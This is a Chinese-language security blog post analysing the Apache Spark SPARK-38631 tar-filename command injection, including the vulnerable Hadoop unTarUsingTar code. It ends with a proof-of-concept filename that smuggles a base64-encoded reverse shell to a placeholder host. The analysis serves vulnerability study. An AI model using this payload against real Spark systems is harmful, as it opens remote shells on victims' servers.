问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
Apache Spark unTarUsingTar 命令注入漏洞 SPARK-38631
# Apache Spark unTarUsingTar 命令注入漏洞 SPARK-38631 ## 漏洞描述 Apache Spark 是一种用于大数据工作负载的分布式开源处理系统。它使用内存中缓存和优化的查询执行方式,可针对任何...
Apache Spark unTarUsingTar 命令注入漏洞 SPARK-38631 ============================================= 漏洞描述 ---- Apache Spark 是一种用于大数据工作负载的分布式开源处理系统。它使用内存中缓存和优化的查询执行方式,可针对任何规模的数据进行快速分析查询。它提供使用Java、Scala、Python 和 R 语言的开发 API,支持跨多个工作负载重用代码—批处理、交互式查询、实时分析、机器学习和图形处理等。当Spark任务的文件名可控时,`Utils.unpack`采用命令拼接的形式对tar文件进行解压,存在任意命令注入的风险。这是源于Hadoop中unTar函数存在问题,在其执行shell命令之前未正确转义文件名,直接拼接命令导致任意命令注入。 漏洞影响 ---- Apache Spark 3.1.2, 3.2.1, 3.3.0 漏洞复现 ---- 我们查看官方的修复补丁 ![img](https://shs3.b.qianxin.com/butian_public/f828674b46ae9147fe6be166db258deaf219d0675805f.jpg) ![img](https://shs3.b.qianxin.com/butian_public/f7825064a196e2893d5bd5c2237d118e4db137112f51c.jpg) 官方修复针对.tar后缀的压缩包调用了新增的unTarUsingJava函数来进行处理,我们下载存在漏洞的版本看一下漏洞位置 ```php hadoop-common-2.7.4.jar!/org/apache/hadoop/fs/FileUtil.class ``` ![img](https://shs3.b.qianxin.com/butian_public/f905151d0bc4b83a254395ff369f7013905b2da64599a.jpg) 可以看到漏洞主要出现在 Linux对文件的解压处理中 ```php public static void unTar(File inFile, File untarDir) throws IOException { if (!untarDir.mkdirs() && !untarDir.isDirectory()) { throw new IOException("Mkdirs failed to create " + untarDir); } else { boolean gzipped = inFile.toString().endsWith("gz"); if (Shell.WINDOWS) { unTarUsingJava(inFile, untarDir, gzipped); } else { unTarUsingTar(inFile, untarDir, gzipped); } } } ``` 这里我们控制压缩tar文件的文件名就可以进行命令注入 ```php private static void unTarUsingTar(File inFile, File untarDir, boolean gzipped) throws IOException { StringBuffer untarCommand = new StringBuffer(); if (gzipped) { untarCommand.append(" gzip -dc '"); untarCommand.append(makeShellPath(inFile)); untarCommand.append("' | ("); } untarCommand.append("cd '"); untarCommand.append(makeShellPath(untarDir)); untarCommand.append("' ; "); untarCommand.append("tar -xf "); if (gzipped) { untarCommand.append(" -)"); } else { untarCommand.append(makeShellPath(inFile)); } String[] shellCmd = new String[]{"bash", "-c", untarCommand.toString()}; ShellCommandExecutor shexec = new ShellCommandExecutor(shellCmd); shexec.execute(); int exitcode = shexec.getExitCode(); if (exitcode != 0) { throw new IOException("Error untarring file " + inFile + ". Tar process exited with exit code " + exitcode); } } ``` 创建Tar文件, 在使用 addArchive执行解压就可以注入恶意命令 ```php touch '1\|{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgueHh4Lnh4eC54eHgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}\|1.tar' ``` ![img](https://shs3.b.qianxin.com/butian_public/f9665079c24690f29f7453389b22753c3899638c81d52.jpg)
发表于 2024-07-12 18:45:31
阅读 ( 1046 )
分类:
Web服务器
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!